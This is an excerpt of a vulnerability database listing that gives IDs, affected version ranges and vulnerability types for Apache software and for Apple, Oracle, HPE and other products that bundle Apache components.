13142| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
13143| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
13144| [94540] Apache Tika 1.9 tika-server File information disclosure
13145| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
13146| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
13147| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
13148| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
13149| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
13150| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
13151| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
13152| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
13153| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
13154| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
13155| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
13156| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
13157| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
13158| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
13159| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
13160| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
13161| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
13162| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
13163| [93532] Apache Commons Collections Library Java privilege escalation
13164| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
13165| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
13166| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
13167| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
13168| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
13169| [93098] Apache Commons FileUpload privilege escalation
13170| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
13171| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
13172| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
13173| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
13174| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
13175| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
13176| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
13177| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
13178| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
13179| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
13180| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
13181| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
13182| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
13183| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
13184| [92549] Apache Tomcat on Red Hat privilege escalation
13185| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
13186| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
13187| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
13188| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
13189| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
13190| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
13191| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
13192| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
13193| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
13194| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
13195| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
13196| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
13197| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
13198| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
13199| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
13200| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
13201| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
13202| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
13203| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
13204| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
13205| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
13206| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
13207| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
13208| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
13209| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
13210| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
13211| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
13212| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
13213| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
13214| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
13215| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
13216| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
13217| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
13218| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
13219| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
13220| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
13221| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
13222| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
13223| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
13224| [90263] Apache Archiva Header denial of service
13225| [90262] Apache Archiva Deserialize privilege escalation
13226| [90261] Apache Archiva XML DTD Connection privilege escalation
13227| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
13228| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
13229| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
13230| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
13231| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
13232| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
13233| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
13234| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
13235| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
13236| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
13237| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
13238| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
13239| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
13240| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
13241| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
13242| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
13243| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
13244| [87765] Apache James Server 2.3.2 Command privilege escalation
13245| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
13246| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
13247| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
13248| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
13249| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
13250| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
13251| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
13252| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
13253| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
13254| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
13255| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
13256| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
13257| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
13258| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
13259| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
13260| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
13261| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
13262| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
13263| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
13264| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
13265| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
13266| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
13267| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
13268| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
13269| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
13270| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
13271| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
13272| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
13273| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
13274| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
13275| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
13276| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
13277| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
13278| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
13279| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
13280| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
13281| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
13282| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
13283| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
13284| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
13285| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
13286| [82076] Apache Ranger up to 0.5.1 privilege escalation
13287| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
13288| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
13289| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
13290| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
13291| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
13292| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
13293| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
13294| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
13295| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
13296| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
13297| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
13298| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
13299| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
13300| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
13301| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
13302| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
13303| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
13304| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
13305| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
13306| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
13307| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
13308| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
13309| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
13310| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
13311| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
13312| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
13313| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
13314| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
13315| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
13316| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
13317| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
13318| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
13319| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
13320| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
13321| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
13322| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
13323| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
13324| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
13325| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
13326| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
13327| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
13328| [79791] Cisco Products Apache Commons Collections Library privilege escalation
13329| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
13330| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
13331| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
13332| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
13333| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
13334| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
13335| [78989] Apache Ambari up to 2.1.1 Open Redirect
13336| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
13337| [78987] Apache Ambari up to 2.0.x cross site scripting
13338| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
13339| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
13340| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
13341| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13342| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13343| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13344| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13345| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13346| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
13347| [77406] Apache Flex BlazeDS AMF Message XML External Entity
13348| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
13349| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
13350| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
13351| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
13352| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
13353| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
13354| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
13355| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
13356| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
13357| [76567] Apache Struts 2.3.20 unknown vulnerability
13358| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
13359| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
13360| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
13361| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
13362| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
13363| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
13364| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
13365| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
13366| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
13367| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
13368| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
13369| [74793] Apache Tomcat File Upload denial of service
13370| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
13371| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
13372| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
13373| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
13374| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
13375| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
13376| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
13377| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
13378| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
13379| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
13380| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
13381| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
13382| [74468] Apache Batik up to 1.6 denial of service
13383| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
13384| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
13385| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
13386| [74174] Apache WSS4J up to 2.0.0 privilege escalation
13387| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
13388| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
13389| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
13390| [73731] Apache XML Security unknown vulnerability
13391| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
13392| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
13393| [73593] Apache Traffic Server up to 5.1.0 denial of service
13394| [73511] Apache POI up to 3.10 Deadlock denial of service
13395| [73510] Apache Solr up to 4.3.0 cross site scripting
13396| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
13397| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
13398| [73173] Apache CloudStack Stack-Based unknown vulnerability
13399| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
13400| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
13401| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
13402| [72890] Apache Qpid 0.30 unknown vulnerability
13403| [72887] Apache Hive 0.13.0 File Permission privilege escalation
13404| [72878] Apache Cordova 3.5.0 cross site request forgery
13405| [72877] Apache Cordova 3.5.0 cross site request forgery
13406| [72876] Apache Cordova 3.5.0 cross site request forgery
13407| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
13408| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
13409| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
13410| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
13411| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
13412| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
13413| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
13414| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
13415| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
13416| [71629] Apache Axis2/C spoofing
13417| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
13418| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
13419| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
13420| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
13421| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
13422| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
13423| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
13424| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
13425| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
13426| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
13427| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
13428| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
| [70809] Apache POI up to 3.11 Crash denial of service
| [70808] Apache POI up to 3.10 unknown vulnerability
| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
| [70749] Apache Axis up to 1.4 getCN spoofing
| [70701] Apache Traffic Server up to 3.3.5 denial of service
| [70700] Apache OFBiz up to 12.04.03 cross site scripting
| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
| [70661] Apache Subversion up to 1.6.17 denial of service
| [70660] Apache Subversion up to 1.6.17 spoofing
| [70659] Apache Subversion up to 1.6.17 spoofing
| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
| [69846] Apache HBase up to 0.94.8 information disclosure
| [69783] Apache CouchDB up to 1.2.0 memory corruption
| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
| [69431] Apache Archiva up to 1.3.6 cross site scripting
| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
| [66739] Apache Camel up to 2.12.2 unknown vulnerability
| [66738] Apache Camel up to 2.12.2 unknown vulnerability
| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
| [66695] Apache CouchDB up to 1.2.0 cross site scripting
| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
| [66356] Apache Wicket up to 6.8.0 information disclosure
| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
| [65668] Apache Solr 4.0.0 Updater denial of service
| [65665] Apache Solr up to 4.3.0 denial of service
| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
| [65410] Apache Struts 2.3.15.3 cross site scripting
| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
